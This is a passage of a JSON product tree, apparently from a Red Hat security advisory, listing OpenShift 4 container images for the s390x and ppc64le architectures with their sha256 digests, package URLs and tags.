"name": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:fddfe46a98d3a4c9a7c189eded7e26758c011f8f32d1617c337711cdd65c18be_s390x",
"product_id": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:fddfe46a98d3a4c9a7c189eded7e26758c011f8f32d1617c337711cdd65c18be_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-oauth-apiserver-rhel9@sha256%3Afddfe46a98d3a4c9a7c189eded7e26758c011f8f32d1617c337711cdd65c18be?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846012"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:7965d673c6109f3fd2baa5efb4c54cae58fb9ba94b33ebba7d187c0f5679c9a0_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:7965d673c6109f3fd2baa5efb4c54cae58fb9ba94b33ebba7d187c0f5679c9a0_s390x",
"product_id": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:7965d673c6109f3fd2baa5efb4c54cae58fb9ba94b33ebba7d187c0f5679c9a0_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-olm-catalogd-rhel9@sha256%3A7965d673c6109f3fd2baa5efb4c54cae58fb9ba94b33ebba7d187c0f5679c9a0?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773850085"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:cdea677053f22dfbac5d00aad0b562674f4141e7450c7c88072407104275e709_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:cdea677053f22dfbac5d00aad0b562674f4141e7450c7c88072407104275e709_s390x",
"product_id": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:cdea677053f22dfbac5d00aad0b562674f4141e7450c7c88072407104275e709_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-olm-operator-controller-rhel9@sha256%3Acdea677053f22dfbac5d00aad0b562674f4141e7450c7c88072407104275e709?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846889"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:db21a1f0033fc83923453b258ea1dd38bf649ae3c4d3c4ef2301d4ce943b6bb0_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:db21a1f0033fc83923453b258ea1dd38bf649ae3c4d3c4ef2301d4ce943b6bb0_s390x",
"product_id": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:db21a1f0033fc83923453b258ea1dd38bf649ae3c4d3c4ef2301d4ce943b6bb0_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openshift-apiserver-rhel9@sha256%3Adb21a1f0033fc83923453b258ea1dd38bf649ae3c4d3c4ef2301d4ce943b6bb0?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846844"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:30ce84b72533a1bafc328c4fa4cd97eeb4491e235cba8fff6c48756dab8e8271_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:30ce84b72533a1bafc328c4fa4cd97eeb4491e235cba8fff6c48756dab8e8271_s390x",
"product_id": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:30ce84b72533a1bafc328c4fa4cd97eeb4491e235cba8fff6c48756dab8e8271_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openshift-controller-manager-rhel9@sha256%3A30ce84b72533a1bafc328c4fa4cd97eeb4491e235cba8fff6c48756dab8e8271?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846693"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:24e26ccdf054e4828cbf3196512d84304dca7c344219c979724e7d37a831c590_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:24e26ccdf054e4828cbf3196512d84304dca7c344219c979724e7d37a831c590_s390x",
"product_id": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:24e26ccdf054e4828cbf3196512d84304dca7c344219c979724e7d37a831c590_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openstack-cinder-csi-driver-rhel9@sha256%3A24e26ccdf054e4828cbf3196512d84304dca7c344219c979724e7d37a831c590?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849462"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:20d0529049b4723cc2ee5a4996b751369d23ed770333a0e2710e0b7d74bbc46f_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:20d0529049b4723cc2ee5a4996b751369d23ed770333a0e2710e0b7d74bbc46f_s390x",
"product_id": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:20d0529049b4723cc2ee5a4996b751369d23ed770333a0e2710e0b7d74bbc46f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openstack-cinder-csi-driver-rhel9-operator@sha256%3A20d0529049b4723cc2ee5a4996b751369d23ed770333a0e2710e0b7d74bbc46f?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844510"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:d40a51c40a9a37a20234160b94a1bf080cc07bdadfc3d53620fb59640a155e29_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:d40a51c40a9a37a20234160b94a1bf080cc07bdadfc3d53620fb59640a155e29_s390x",
"product_id": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:d40a51c40a9a37a20234160b94a1bf080cc07bdadfc3d53620fb59640a155e29_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openstack-cloud-controller-manager-rhel9@sha256%3Ad40a51c40a9a37a20234160b94a1bf080cc07bdadfc3d53620fb59640a155e29?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846313"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:21055d354c6b6ad8850bc85223cab6a9173633524bafe31c1031b6f8693cd7d5_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:21055d354c6b6ad8850bc85223cab6a9173633524bafe31c1031b6f8693cd7d5_s390x",
"product_id": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:21055d354c6b6ad8850bc85223cab6a9173633524bafe31c1031b6f8693cd7d5_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-framework-tools-rhel9@sha256%3A21055d354c6b6ad8850bc85223cab6a9173633524bafe31c1031b6f8693cd7d5?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847717"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:3cf987d5f69ec722a2b608f18a58526e86a063c29c222afd7ef574e64452bbc1_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:3cf987d5f69ec722a2b608f18a58526e86a063c29c222afd7ef574e64452bbc1_s390x",
"product_id": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:3cf987d5f69ec722a2b608f18a58526e86a063c29c222afd7ef574e64452bbc1_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ovn-kubernetes-rhel9@sha256%3A3cf987d5f69ec722a2b608f18a58526e86a063c29c222afd7ef574e64452bbc1?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773852900"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:8c41cf0e7e426f5092ac57f893c807b846a5737aa27882068ec6a982758aa8f1_s390x",
"product": {
"name": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:8c41cf0e7e426f5092ac57f893c807b846a5737aa27882068ec6a982758aa8f1_s390x",
"product_id": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:8c41cf0e7e426f5092ac57f893c807b846a5737aa27882068ec6a982758aa8f1_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/openshift-route-controller-manager-rhel9@sha256%3A8c41cf0e7e426f5092ac57f893c807b846a5737aa27882068ec6a982758aa8f1?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849752"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:9324db9c450ee8a54926478918a4efa70943cbc29ae8e2e67f51fe60bfd75335_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:9324db9c450ee8a54926478918a4efa70943cbc29ae8e2e67f51fe60bfd75335_s390x",
"product_id": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:9324db9c450ee8a54926478918a4efa70943cbc29ae8e2e67f51fe60bfd75335_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-service-ca-rhel9-operator@sha256%3A9324db9c450ee8a54926478918a4efa70943cbc29ae8e2e67f51fe60bfd75335?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849096"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:a90a60e27885e3ac1f74d00cb255478652da90af02a3771750b8598a53e9e48a_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:a90a60e27885e3ac1f74d00cb255478652da90af02a3771750b8598a53e9e48a_s390x",
"product_id": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:a90a60e27885e3ac1f74d00cb255478652da90af02a3771750b8598a53e9e48a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-tools-rhel9@sha256%3Aa90a60e27885e3ac1f74d00cb255478652da90af02a3771750b8598a53e9e48a?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848264"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:29e39816ed2201098199d5dbdc5f97bb584e815a1212fcda98cc51d7fdcb7508_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:29e39816ed2201098199d5dbdc5f97bb584e815a1212fcda98cc51d7fdcb7508_s390x",
"product_id": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:29e39816ed2201098199d5dbdc5f97bb584e815a1212fcda98cc51d7fdcb7508_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ovn-kubernetes-microshift-rhel9@sha256%3A29e39816ed2201098199d5dbdc5f97bb584e815a1212fcda98cc51d7fdcb7508?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773850280"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:c16b49f06ab83306a1859620bc6b9721b8cd6af4a55248f55aad32da14b3b7c8_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:c16b49f06ab83306a1859620bc6b9721b8cd6af4a55248f55aad32da14b3b7c8_s390x",
"product_id": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:c16b49f06ab83306a1859620bc6b9721b8cd6af4a55248f55aad32da14b3b7c8_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prom-label-proxy-rhel9@sha256%3Ac16b49f06ab83306a1859620bc6b9721b8cd6af4a55248f55aad32da14b3b7c8?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847846"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:0101d5fe5eb0f2c3144ba364412dcd21c0c7b08c0beacd3fc5dd564767b2d9e0_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:0101d5fe5eb0f2c3144ba364412dcd21c0c7b08c0beacd3fc5dd564767b2d9e0_s390x",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:0101d5fe5eb0f2c3144ba364412dcd21c0c7b08c0beacd3fc5dd564767b2d9e0_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-config-reloader-rhel9@sha256%3A0101d5fe5eb0f2c3144ba364412dcd21c0c7b08c0beacd3fc5dd564767b2d9e0?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846285"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:7304e26ef6c8ab4d2c647cc2ba65af9a92fd0f1fead62da0c435d71b397aada8_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:7304e26ef6c8ab4d2c647cc2ba65af9a92fd0f1fead62da0c435d71b397aada8_s390x",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:7304e26ef6c8ab4d2c647cc2ba65af9a92fd0f1fead62da0c435d71b397aada8_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-rhel9-operator@sha256%3A7304e26ef6c8ab4d2c647cc2ba65af9a92fd0f1fead62da0c435d71b397aada8?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849686"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:1a3732c862f54453a192ebf7727b2f0339909e2207b3ae809ffa321f14d1cc17_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:1a3732c862f54453a192ebf7727b2f0339909e2207b3ae809ffa321f14d1cc17_s390x",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:1a3732c862f54453a192ebf7727b2f0339909e2207b3ae809ffa321f14d1cc17_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-operator-admission-webhook-rhel9@sha256%3A1a3732c862f54453a192ebf7727b2f0339909e2207b3ae809ffa321f14d1cc17?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773845326"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:c6e0d575be3fe6bab07ec95b244600e5eb6e8fcae5df1fd7b344381aae921c17_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:c6e0d575be3fe6bab07ec95b244600e5eb6e8fcae5df1fd7b344381aae921c17_s390x",
"product_id": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:c6e0d575be3fe6bab07ec95b244600e5eb6e8fcae5df1fd7b344381aae921c17_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-telemeter-rhel9@sha256%3Ac6e0d575be3fe6bab07ec95b244600e5eb6e8fcae5df1fd7b344381aae921c17?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846658"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:bb8d6f977a5b10490657a0e713ce281ac0680bf68caf893c46fe9ca84093b4b1_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:bb8d6f977a5b10490657a0e713ce281ac0680bf68caf893c46fe9ca84093b4b1_s390x",
"product_id": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:bb8d6f977a5b10490657a0e713ce281ac0680bf68caf893c46fe9ca84093b4b1_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-thanos-rhel9@sha256%3Abb8d6f977a5b10490657a0e713ce281ac0680bf68caf893c46fe9ca84093b4b1?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844591"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/volume-data-source-validator-rhel9@sha256:c4d991da60458b7fd027719a7fe411bdfe82b192e7e882767dda61037e28aa3e_s390x",
"product": {
"name": "registry.redhat.io/openshift4/volume-data-source-validator-rhel9@sha256:c4d991da60458b7fd027719a7fe411bdfe82b192e7e882767dda61037e28aa3e_s390x",
"product_id": "registry.redhat.io/openshift4/volume-data-source-validator-rhel9@sha256:c4d991da60458b7fd027719a7fe411bdfe82b192e7e882767dda61037e28aa3e_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/volume-data-source-validator-rhel9@sha256%3Ac4d991da60458b7fd027719a7fe411bdfe82b192e7e882767dda61037e28aa3e?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847698"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:c6ac4b0406087730cb3689049a5322f057cb7f6e2caf6f39dee68baa115cc85b_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:c6ac4b0406087730cb3689049a5322f057cb7f6e2caf6f39dee68baa115cc85b_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:c6ac4b0406087730cb3689049a5322f057cb7f6e2caf6f39dee68baa115cc85b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-autoscaler-rhel9@sha256%3Ac6ac4b0406087730cb3689049a5322f057cb7f6e2caf6f39dee68baa115cc85b?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849291"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:ac86e849e17e9a83d6683ed0469538f758a53aec6fbe89df675c66ef66f007e6_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:ac86e849e17e9a83d6683ed0469538f758a53aec6fbe89df675c66ef66f007e6_ppc64le",
"product_id": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:ac86e849e17e9a83d6683ed0469538f758a53aec6fbe89df675c66ef66f007e6_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/aws-karpenter-provider-aws-rhel9@sha256%3Aac86e849e17e9a83d6683ed0469538f758a53aec6fbe89df675c66ef66f007e6?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849087"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:ad92acc19589b0305162857f2a14d8174fc4cb90d5ffc09991f49de756ae61c7_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:ad92acc19589b0305162857f2a14d8174fc4cb90d5ffc09991f49de756ae61c7_ppc64le",
"product_id": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:ad92acc19589b0305162857f2a14d8174fc4cb90d5ffc09991f49de756ae61c7_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/aws-kms-encryption-provider-rhel9@sha256%3Aad92acc19589b0305162857f2a14d8174fc4cb90d5ffc09991f49de756ae61c7?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846847"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:b39b3e7a8be95fb0190842c892edaac58878ef2a3c0e59a59365504aef68c101_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:b39b3e7a8be95fb0190842c892edaac58878ef2a3c0e59a59365504aef68c101_ppc64le",
"product_id": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:b39b3e7a8be95fb0190842c892edaac58878ef2a3c0e59a59365504aef68c101_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/azure-kms-encryption-provider-rhel9@sha256%3Ab39b3e7a8be95fb0190842c892edaac58878ef2a3c0e59a59365504aef68c101?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844452"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:e3d92a87de3c10beda3aba219657f079cafcd03c6ee0b87bd0826d3f51e85997_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:e3d92a87de3c10beda3aba219657f079cafcd03c6ee0b87bd0826d3f51e85997_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:e3d92a87de3c10beda3aba219657f079cafcd03c6ee0b87bd0826d3f51e85997_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-machine-controllers-rhel9@sha256%3Ae3d92a87de3c10beda3aba219657f079cafcd03c6ee0b87bd0826d3f51e85997?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844519"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:24b98a6e4bc5f0edd37fcb1a0aefa809cc95d50a22da8059c3a8a6811d1596ad_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:24b98a6e4bc5f0edd37fcb1a0aefa809cc95d50a22da8059c3a8a6811d1596ad_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:24b98a6e4bc5f0edd37fcb1a0aefa809cc95d50a22da8059c3a8a6811d1596ad_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-runtimecfg-rhel9@sha256%3A24b98a6e4bc5f0edd37fcb1a0aefa809cc95d50a22da8059c3a8a6811d1596ad?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848375"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:63f0b1ba5c3947e640911e31b9032bce1b7e3cffd16574158a67a9d8bfbb52d1_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:63f0b1ba5c3947e640911e31b9032bce1b7e3cffd16574158a67a9d8bfbb52d1_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:63f0b1ba5c3947e640911e31b9032bce1b7e3cffd16574158a67a9d8bfbb52d1_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-etcd-rhel9-operator@sha256%3A63f0b1ba5c3947e640911e31b9032bce1b7e3cffd16574158a67a9d8bfbb52d1?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848362"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:6f5d819b8b433e84c4bb7c41a6a31f1265be15ccbb13a0605d0dc16d718904de_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:6f5d819b8b433e84c4bb7c41a6a31f1265be15ccbb13a0605d0dc16d718904de_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:6f5d819b8b433e84c4bb7c41a6a31f1265be15ccbb13a0605d0dc16d718904de_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-monitoring-rhel9-operator@sha256%3A6f5d819b8b433e84c4bb7c41a6a31f1265be15ccbb13a0605d0dc16d718904de?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846727"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:762abf08666427b5aa8c7d7da94508e223a19a106e551615db8d12ecdb05a680_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:762abf08666427b5aa8c7d7da94508e223a19a106e551615db8d12ecdb05a680_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:762abf08666427b5aa8c7d7da94508e223a19a106e551615db8d12ecdb05a680_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-network-rhel9-operator@sha256%3A762abf08666427b5aa8c7d7da94508e223a19a106e551615db8d12ecdb05a680?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849299"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:03906fb92943c8529cfe1e466bec8f8daf8e41981d98dd0dd8470dc2881d44fe_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:03906fb92943c8529cfe1e466bec8f8daf8e41981d98dd0dd8470dc2881d44fe_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:03906fb92943c8529cfe1e466bec8f8daf8e41981d98dd0dd8470dc2881d44fe_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-node-tuning-rhel9-operator@sha256%3A03906fb92943c8529cfe1e466bec8f8daf8e41981d98dd0dd8470dc2881d44fe?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844901"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:87de8c9f5d7d591609208ab4332efa976b4ed303dd18f879374f2d047c9b8c9f_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:87de8c9f5d7d591609208ab4332efa976b4ed303dd18f879374f2d047c9b8c9f_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:87de8c9f5d7d591609208ab4332efa976b4ed303dd18f879374f2d047c9b8c9f_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-policy-controller-rhel9@sha256%3A87de8c9f5d7d591609208ab4332efa976b4ed303dd18f879374f2d047c9b8c9f?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846560"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:d3971e090065233100d9c842b116a8abed46852cf16fe23c6a02601c6898471d_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:d3971e090065233100d9c842b116a8abed46852cf16fe23c6a02601c6898471d_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:d3971e090065233100d9c842b116a8abed46852cf16fe23c6a02601c6898471d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-storage-rhel9-operator@sha256%3Ad3971e090065233100d9c842b116a8abed46852cf16fe23c6a02601c6898471d?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846629"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:da24b2db5c1cf99b9910abba7846c7301e1ae4fa9fa5e99e639b7840d1d53a81_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:da24b2db5c1cf99b9910abba7846c7301e1ae4fa9fa5e99e639b7840d1d53a81_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:da24b2db5c1cf99b9910abba7846c7301e1ae4fa9fa5e99e639b7840d1d53a81_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-version-rhel9-operator@sha256%3Ada24b2db5c1cf99b9910abba7846c7301e1ae4fa9fa5e99e639b7840d1d53a81?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773845313"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:12f808f0c0a7103699e60487369cc7e4938098c9e8844c192e957fcd564f7fd3_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:12f808f0c0a7103699e60487369cc7e4938098c9e8844c192e957fcd564f7fd3_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:12f808f0c0a7103699e60487369cc7e4938098c9e8844c192e957fcd564f7fd3_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-configmap-reloader-rhel9@sha256%3A12f808f0c0a7103699e60487369cc7e4938098c9e8844c192e957fcd564f7fd3?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848132"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:47c2783399e696c5e9c87ba45a653580d79f0ff9da2452c6bddc78c504a593be_ppc64le",
"product": {
